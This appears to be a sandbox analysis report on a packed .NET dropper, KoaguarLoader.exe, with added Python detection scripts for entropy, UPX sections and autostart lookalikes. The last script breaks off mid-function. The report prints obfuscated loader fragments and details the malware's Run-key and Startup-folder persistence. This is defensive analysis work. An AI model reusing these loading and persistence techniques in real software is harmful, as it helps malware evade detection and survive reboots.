                        Source: KoaguarLoader.exeStatic file information: File size 3343360 > 1048576
                        Source: KoaguarLoader.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x32e200

                        Data Obfuscation

                        Source: svhost.exe.0.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{z6XG9VNMgzKSI0w.unFXqwBJ68GelpH,z6XG9VNMgzKSI0w.s48HSwTVVklT4LA,z6XG9VNMgzKSI0w.XJMsVfSD4lRIZS8,z6XG9VNMgzKSI0w.sPmSSioJJzPDsiv,fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.yumjM6h7CZGkl79chDMkSEbZqXAktCEjp()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svhost.exe.0.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[2],fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.ynifprEnwqGbE6CNgi4tL8BpTvW93ylYQ(Convert.FromBase64String(jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{z6XG9VNMgzKSI0w.unFXqwBJ68GelpH,z6XG9VNMgzKSI0w.s48HSwTVVklT4LA,z6XG9VNMgzKSI0w.XJMsVfSD4lRIZS8,z6XG9VNMgzKSI0w.sPmSSioJJzPDsiv,fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.yumjM6h7CZGkl79chDMkSEbZqXAktCEjp()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[2],fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.ynifprEnwqGbE6CNgi4tL8BpTvW93ylYQ(Convert.FromBase64String(jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all three), sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{z6XG9VNMgzKSI0w.unFXqwBJ68GelpH,z6XG9VNMgzKSI0w.s48HSwTVVklT4LA,z6XG9VNMgzKSI0w.XJMsVfSD4lRIZS8,z6XG9VNMgzKSI0w.sPmSSioJJzPDsiv,fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.yumjM6h7CZGkl79chDMkSEbZqXAktCEjp()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all three), sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[2],fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.ynifprEnwqGbE6CNgi4tL8BpTvW93ylYQ(Convert.FromBase64String(jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svhost.exe.0.dr, 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all five), sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs .Net Code: _7tKMGb6lJn2k5bzhno1pNQO4s20ODbuIR4JXEcwCZGtlA8vCTvm7OEg7atqva2Qho9Sya04sMZPwEyEB9jlVBlLa37 System.AppDomain.Load(byte[])
                        Source: svhost.exe.0.dr, 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all five), sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs .Net Code: ABtXL83KmEzSWaBHLhbHrrir8o8sgBuxMjOBt3qn6SZRgcvVXvj4Wu6MdxzqLrx03kJo1giozk1sqtpirv3N5L49AF System.AppDomain.Load(byte[])
                        Source: svhost.exe.0.dr, 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all five), sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs .Net Code: ABtXL83KmEzSWaBHLhbHrrir8o8sgBuxMjOBt3qn6SZRgcvVXvj4Wu6MdxzqLrx03kJo1giozk1sqtpirv3N5L49AF
                        Source: KoaguarLoader.exe.0.dr Static PE information: section name: UPX2
                        Source: HkqNfKUrMBAD.exe.2.dr Static PE information: section name: UPX2
                        Source: I1y524I4zau1n3u.exe.2.dr Static PE information: section name: UPX2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF93699D2A5 pushad ; iretd 5_2_00007FF93699D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF936B82316 push 8B485F92h; iretd 5_2_00007FF936B8231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF93699D2A5 pushad ; iretd 10_2_00007FF93699D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF93699D2A5 pushad ; iretd 13_2_00007FF93699D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF936ABB8FA push E85A70D7h; ret 13_2_00007FF936ABBAF9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF936AB131D push eax; ret 13_2_00007FF936AB138B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF936B82316 push 8B485F92h; iretd 13_2_00007FF936B8231B
                        Source: svhost.exe.0.dr, 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all five), 6qLYWbyFK6qWQKW2MkuPmQFT7Q4f9DhTx.cs High entropy of concatenated method names: 'HB0nHcvGHllU4fCudgsk0k5ZhPL9hVYfa', '_5XpEUURxN68BPDK5cYXoCmenv4tTHtJiP', 'PnTalNGqESallzXuVY3xXhj4eqoXY8ga5', 'VD4a4FMbUq9YEJkvqd', 'opi6fbn7AE78VCKqxA', 'bBZMODwHlaHkIiWoam', 'AVvY9jqnmfbupsLVTQ', 'oRTqijffP2WzGVKQqf', 'orkPLEyg6SvYd8aeqW', 'dQpf4cbfjFubfl3NwQ'
                        Source: svhost.exe.0.dr, 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all five), PdOOlX6Rtzqfchw.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'eN1JIA4zkAsyaD3pChMi7bNrCU0D3oAyM', 'PwozvAvmtdvBFx7DfOHXokWB2K3FjRf3M', 'dB7yd4xFQG5ZOsSIZP3r7VleYmmVHCurV', 'K74BrBicfZZMTVgjVoH9fY6gXgPKuWCYD'
                        Source: svhost.exe.0.dr, 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all five), s06KECHfaqSu2R0.cs High entropy of concatenated method names: '_34b6HPpANa7f2zU', 'rlYSW350KSm2Q0n', 'yVdEWbztAmDtwEl', 'NBS38W4O4iwGD7s', 'UGjk0iU36mOFVBw', '_1sNuZOq7sZwBeWe', 'MujzZRRDu6Pyvkr', 'PYDx4z2YfoJ6lo3', '_9cc9fPDukijRsg4', 'txWqTebWeGSxBXP'
                        Source: svhost.exe.0.dr, 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all five), fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.cs High entropy of concatenated method names: 'MyRTOcwgUCRfktTKscSpaYX6Lyxe2mBLXGefeLVy8lz0FbZGsqHmrldQyUHRjvSNJaVLWd8C0xkN5Xdv2xNpZSbxRf', 'McffwUCOjGH47WJcEYTNRVPJmjPaIjMsaKwEChB4c7ot30A1MXxkMnm5jSeYjcJV17CmH8Q9lXn1KWnvbfdgM1MziC', 'zAVqEGWPmkpBqWfqUeBXC3tQykKLbyYq3cKKWGumgTHv5bQm63HG8dAxTL4X0BCTgE6ivtlqwiFyFpmzPQnWi8shgP', 'BpHf1DAMnZq95CUrTmp6juTrJ8sB0Q4NfNYERbgJS51QWCEMydJZnpj8erlyyA74JXPOxhjd2Fa0DfPgtMEn30DP5R', '_1RSde5xnPX0XHMyWsWixoUbZNDTyTIcthJu4hmvJmlN0tbPCeENgUnWmQvmqqYrNydi5V0AxPpVxUrelBe3DpiBzke', 'F0JXH0FVkdQ4JpNOMccvuHVYoyZQi07XTpoFsycGwTgGjHxYjA27baNMKyEPWd0rzsx5AIOdPF3iYsHHtgbXhJGgtH', 'd09DcodNNmAtQwMlWk5K5fBAnVBVFkbbhVq9o2RFraOFTIfJEYfQuikgNdKIDON7rR9JEIwJ3ZNBRV8jQG8D0Pdjba', 'Wt1d6KQipyyiGN38BwnbzG2xtm3CHo6h8AejhyrNXVmdy4J8AjuZ2og9jk10mT7uiBC5vaVHO9YnWSRnx2dEPmxvtl', 'PNhDheFVbxndP8C7m7wFOrJvbDMVHbV0m', 'o0YX5c1UV2izzFDIOA0C9ixOXrFL0CMP6'
                        Source: svhost.exe.0.dr, 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all five), sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs High entropy of concatenated method names: 'fjxx7Cpj8t98HOaueHyLKAhPbi19PhKTWdATPwXCVr5OLA9RVVxQdIJWNWAJLJA9bC7EUaMAKY7luliYJOLJRTJzZH', '_7tKMGb6lJn2k5bzhno1pNQO4s20ODbuIR4JXEcwCZGtlA8vCTvm7OEg7atqva2Qho9Sya04sMZPwEyEB9jlVBlLa37', 'QRGhygyziTFu3beTyypXV5wTeLw87CaoHdxecadIXu3h8UdUh9ulNOFahen8LhsimbOzJj36mKC5lySfVwtD10PQSK', 'gEjyH3vv3xbtNs0ORNHQS7apurMB0PQnOYAepnMEu9RgWL9JmkgcR1sTakxCVrtsKazblpXR88Dyv8uRu1xqSwSZNc', 'uoMpudYCrZJRhsDbx6FNCAx7rd7ToTpD4qbsS5RLbhLYNi2rjobxWl2mNZlVkp9g0zeaEVrtd3bHhW56CgJytTDHlP', '_5Tt4brxHmaF93KJJZg97WrB1MtIBjnqJfrUhVtrX5q9T0kR8gKMV67HcgL2mQNQxRM06ramWMgxbtapzmLaxgD4cy4', 'ydG9SWBXC4D5TX8jN1WwgXulK8tV0MInhRUaEfMwNj3z7SvC4FaIOiuq9FQclGGqoGOnZaYEPyqSmF7ZACt0RVOkBJ', 'DOP1CPrIOR00iOFDLuXOt2WiPwXSQUka8Cvf1OnPI2tVRVpXR6lgUu62lbZZlKLZK2gQLrR1c4OTx0Z3Io3c65ykQx', 'BKbJQzlvGCRJVie80MjWIQMsoJ2UPufRtAm5UMrMjsQInxc4LdrIkifxu21e4kNzBlifSdVfMZEUFROuGeCqSYbmeZ', 'tVamnSKuv7DQDmBf0g3k5GgvGYHwfb9NYMSiVV68N4pKfQ0yyvxu4q74OP5GtPhGPCWZJ5KkBLc2R6ssA7Axyu3sya'
                        Source: svhost.exe.0.dr, 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all five), j7CxY8VJCXsgfpfgNGwki0Ktagndhv4AVokBnp0OSdwntgf4x7CcSfyRWLsuXe230GnCbdTRJkgG551k64zmGnt6pb.cs High entropy of concatenated method names: 'LKxV98wGAo9eL17wRpFLaJ0yq5mplxT6qMTLzFxHpU8MP4iZBXyLftjugZVyX3QQQuBAKpOuNLW534Nk0QbjTylPdz', 'Y5mpNauWmEfU6zZjkV', 'k1q8l88CNNExpjrDUw', 'Zn24Kc7qAgwHXlZ2eQ', 'eYa0ZIJwm9KIm08HDa'
                        Source: svhost.exe.0.dr, 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all five), E1KFEgHGhH0nvji.cs High entropy of concatenated method names: 'iQOT3b8MMl29teM', 'b0UvRFf299vpih6', 'DI3hWbTayjELyGq', 'aeY9HYWEiD0FnoN', 'UpwMJwgy7qjCIeH', 'ZquDJCBOV1tLZiD', 'cy2bv1MdT0k1gL5', 'ltfFYDooW1soJs6', 'EWbk2tBnAb6wrvn', 'xITER9TKup2p1wk'
                        Source: svhost.exe.0.dr, 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all five), mz0y4kDiZLBo1CD8kctviln15Mlav4wWqkiophhSIbAY36tFYR0bzy8aUlhtkDGzMWh01GiNohDriTCeHcUR7oD895.cs High entropy of concatenated method names: 'HQ4SmufoVeTWvZHMPWE38mJowv0ZqhbBlrHxpGKre8MaENZhXGPam4eUnAeh6qTIBsQvF8YXFwVKjbOJqfuStF4j3D', 'whVwF84cdhqhBlK13F', 'm3GXfGHyogcdXOobmt', 'EK9XryzRcF6AbqBZyj', '_0JFxjjsypx5pg0r4LV'
                        Source: svhost.exe.0.dr, 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, svhost.exe.3.dr, 3.2.svhost.exe.31e05f0.0.raw.unpack (identical in all five), HinmvclvjMV04j4LsLs1R5hhpSJTYBZXnfPuNv9c1JrEyOq6sBV7oTZLjwr6e3IVUwGiigOYcN1IBjL3qkE4kJlIBN.cs High entropy of concatenated method names: 'TvTk9crAf1vPq1l7tQNMAajN5dO0BIlajnUfjWF1DTfGzmKVVDDW5UCVsc6RbnHgFe0iTKM23LIT7YrIvJGJXjw8fx', '_3WyUne7TIopD6ctftiAb0vgov9HIVn28hXSFdP20sdCpetye5cBMasORZyxCL0rPac8gwCj4wOcQr6OFRWPQIoBpVy', '_4NZOm9t2GJDzuWgo6xRGWdGRCZPx4sw3xsdWbBBEoXF3sRhNLJDMr3j95ioDf4N94fY9fgRv1jhU9opxdZrvA6SJ2Z', '_9qnsjnbHjKKlcUXfAmx6duO7YflZEhnW7at5574mDd3EaQWlechuF1Zhib2dFBnN21fPkclHWtlPfbJWLp1sVKMyrM', 'u6NcUUD2Va1J0dw4jw', 'XOFS6ORvGscpqc8H7d', '_5E61Grpyt0KrY78W70', 'fnmyZe45FG1ll8J6cS', 'GbnyL2c95RcwyGfI3Z', 'Uj9Jfu4uXIR6ZbaK5l'
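The "High entropy of concatenated method names" hits above are the same nine classes in every unpacked copy. The script below, an added example rather than Joe Sandbox's own code, reproduces that heuristic: it joins the method names of a class into one string and scores it with Shannon entropy in bits per character. The sample names are copied from the report's svhost.exe.0.dr entries; the ConfigLoader class is invented for contrast, and the 4.8 bits/char cut-off is an assumption, not the sandbox's threshold.

```python
"""Entropy heuristic behind the report's "High entropy of concatenated method
names" lines. Added example, not Joe Sandbox code; the entropy measure
(Shannon, bits per character) and the cut-off are assumptions."""
import math
from collections import Counter

# Constructed input: method names copied from two of the classes the report
# lists for svhost.exe.0.dr, plus one invented clean class for contrast.
SAMPLE_CLASSES = {
    "6qLYWbyFK6qWQKW2MkuPmQFT7Q4f9DhTx": [
        "HB0nHcvGHllU4fCudgsk0k5ZhPL9hVYfa", "_5XpEUURxN68BPDK5cYXoCmenv4tTHtJiP",
        "PnTalNGqESallzXuVY3xXhj4eqoXY8ga5", "VD4a4FMbUq9YEJkvqd",
        "opi6fbn7AE78VCKqxA", "bBZMODwHlaHkIiWoam", "AVvY9jqnmfbupsLVTQ",
    ],
    # Mixed class: a few real .NET members plus generated names. The normal
    # members do not pull the score down enough to hide the rest.
    "PdOOlX6Rtzqfchw": [
        "Equals", "GetHashCode", "GetType", "ToString",
        "Create__Instance__", "Dispose__Instance__",
        "eN1JIA4zkAsyaD3pChMi7bNrCU0D3oAyM", "PwozvAvmtdvBFx7DfOHXokWB2K3FjRf3M",
        "dB7yd4xFQG5ZOsSIZP3r7VleYmmVHCurV", "K74BrBicfZZMTVgjVoH9fY6gXgPKuWCYD",
    ],
    # Invented clean class (not from the report).
    "ConfigLoader": ["Load", "Parse", "Validate", "GetValue", "SetValue", "Save"],
}

THRESHOLD_BITS = 4.8  # assumption: English-like identifiers stay well below this


def shannon_entropy(text: str) -> float:
    """Shannon entropy of text in bits per character (0.0 for empty input)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def class_entropy(method_names) -> float:
    """Entropy of all method names of one class joined into a single string."""
    return shannon_entropy("".join(method_names))


def flag_obfuscated(classes, threshold=THRESHOLD_BITS):
    """Return {class_name: entropy} for every class at or above the threshold."""
    scored = {cls: round(class_entropy(names), 3) for cls, names in classes.items()}
    return {cls: bits for cls, bits in scored.items() if bits >= threshold}


if __name__ == "__main__":
    for cls, names in SAMPLE_CLASSES.items():
        print(f"{class_entropy(names):.2f} bits/char  {cls}")
    print("flagged:", sorted(flag_obfuscated(SAMPLE_CLASSES)))
```

Scoring the concatenation rather than each name is what keeps short generated names (VD4a4FMbUq9YEJkvqd) from slipping under a per-name threshold, and it is why a class that mixes real members with generated ones still scores high.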
                        Source: initial sample | Static PE information: section name: UPX0 (listed three times in the report)
                        Source: initial sample | Static PE information: section name: UPX1 (listed three times in the report)
                        Source: C:\Users\user\Desktop\KoaguarLoader.exe | File created: C:\Users\user\AppData\Local\Temp\svhost.exe
                        Source: C:\Users\user\Desktop\KoaguarLoader.exe | File created: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe | File created: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe | File created: C:\Users\user\AppData\Roaming\svhost.exe
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe | File created: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe
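The two static signatures above (high-entropy .NET method names in the unpacked svhost.exe memory dump, and UPX0/UPX1 section names in the initial sample) are both entropy-and-layout checks that an analyst can reproduce offline without waiting for a sandbox. The script below is an added example, not Joe Sandbox's or the sample's code: it walks the PE section table by hand (no `pefile` dependency), computes per-section Shannon entropy, flags the usual UPX layout (a UPX0 section with no raw bytes but a large virtual size next to a near-8.0-bit UPX1), and applies the same entropy measure to a list of method names. The PE image it builds for its self-test is a constructed synthetic file, not the analysed binary, and the "readable names" list is constructed too; the 7.0-bit UPX1 threshold and the ~4.5-bit split between readable and generated identifiers are the author's working values, not figures from the report.

```python
import math
import struct
import sys
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per symbol (0.0 for empty input, at most 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def names_entropy(method_names) -> float:
    """Entropy of all method names joined together: obfuscators that emit random
    identifiers push this well above the ~4 bits typical of readable .NET names."""
    return shannon_entropy("".join(method_names).encode("utf-8"))


def pe_sections(data: bytes):
    """Walk the PE section table by hand and return one dict per section:
    name, virtual size, raw size, raw-data entropy, characteristics."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    # PointerToSymbolTable(4) NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    num_sections, opt_size = struct.unpack_from("<H12xH", data, coff + 2)
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        # IMAGE_SECTION_HEADER is 40 bytes; Name is 8 bytes, NUL padded
        (name, vsize, _vaddr, raw_size, raw_ptr,
         _reloc, _lines, _nreloc, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        body = data[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "raw_size": raw_size,
            "entropy": round(shannon_entropy(body), 2),
            "characteristics": chars,
        })
    return sections


UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}


def upx_indicators(sections):
    """Triage verdict: UPX section names, plus the usual UPX layout where UPX0 has no
    raw data but a large virtual size (the in-memory unpacking destination) and
    UPX1 (compressed payload plus stub) has near-maximal entropy."""
    by_name = {s["name"]: s for s in sections}
    upx0, upx1 = by_name.get("UPX0"), by_name.get("UPX1")
    return {
        "upx_section_names": [s["name"] for s in sections if s["name"] in UPX_SECTION_NAMES],
        "hollow_upx0": bool(upx0) and upx0["raw_size"] == 0 and upx0["virtual_size"] > 0,
        "high_entropy_upx1": bool(upx1) and upx1["entropy"] >= 7.0,
    }


def build_minimal_pe(sections):
    """Constructed test input: a tiny, non-runnable PE image with the given section
    table, just enough for pe_sections() to parse. sections: [(name, raw_bytes, virtual_size)]."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0  # section-table parsing does not need an optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0)
    raw_ptr = e_lfanew + 4 + 20 + 40 * len(sections)  # raw data follows the headers
    table, blobs = b"", b""
    for name, raw, vsize in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, 0x1000,
                             len(raw), raw_ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        raw_ptr += len(raw)
        blobs += raw
    return dos + b"PE\0\0" + coff + table + blobs


# Constructed sample shaped like a UPX-packed file (not the analysed binary)
SYNTHETIC_UPX = build_minimal_pe([
    ("UPX0", b"", 0x20000),                  # hollow: no raw bytes, 128 KiB virtual
    ("UPX1", bytes(range(256)) * 8, 0x800),  # every byte value equally often: entropy 8.0
    (".rsrc", b"\0" * 512, 0x200),           # all zeros: entropy 0.0
])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SYNTHETIC_UPX
    secs = pe_sections(data)
    for s in secs:
        print(f"{s['name']:<8} raw={s['raw_size']:<8} virt={s['virtual_size']:<8} H={s['entropy']}")
    print(upx_indicators(secs))
```

Run it with a file path to triage a real sample; without arguments it parses the synthetic image. A hollow UPX0 with a high-entropy UPX1 is the signature of an unmodified UPX stub, and such files usually unpack with `upx -d`; packers that only borrow the UPX section names, or that patch the stub, keep the names but break the layout, which is why both checks are reported separately.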

                        Boot Survival

                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svhost (3 occurrences)
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HkqNfKUrMBAD (3 occurrences)
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run I1y524I4zau1n3u (3 occurrences)
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk (2 occurrences)
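The persistence above is the textbook pair: three HKCU Run values (svhost, HkqNfKUrMBAD, I1y524I4zau1n3u) plus a Startup-folder shortcut, with the value names matching the dropped executables. The script below is an added example for hunting exactly this pattern on a host, not code from the report or the sample. It scores an autostart entry on three independent signals: the target lives in a user-writable directory, the file name is one edit away from a real Windows binary (svhost vs svchost), and the name looks machine-generated. The Run-value command data is assumed to be the path of the dropped file of the same name (the report shows the names and the drops, not the value data); the OneDrive entry is a constructed benign line included to show the false-positive mode, and the known-binary list and the scoring thresholds are the author's choices. On Windows, `hunt_live()` repeats the checks against the real Run keys and Startup folder; elsewhere it returns an empty list.

```python
import os

# Windows binaries whose names droppers imitate (general knowledge, not from the report)
KNOWN_SYSTEM_NAMES = ("svchost", "csrss", "lsass", "explorer", "winlogon", "services",
                      "conhost", "dllhost", "rundll32", "taskhostw")
# Path fragments a standard user can write to; autostarts pointing here get a closer look
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character lookalikes such as svhost/svchost."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(stem: str):
    """Return the system binary name this stem is exactly one edit away from, else None."""
    stem = stem.lower()
    for known in KNOWN_SYSTEM_NAMES:
        if stem != known and levenshtein(stem, known) == 1:
            return known
    return None


def looks_generated(stem: str) -> bool:
    """Heuristic for machine-generated names (author's thresholds): three or more
    digits, or four or more upper/lower case flips between adjacent letters."""
    digits = sum(ch.isdigit() for ch in stem)
    flips = sum(1 for x, y in zip(stem, stem[1:])
                if x.isalpha() and y.isalpha() and x.isupper() != y.isupper())
    return digits >= 3 or flips >= 4


def exe_from_command(cmd: str) -> str:
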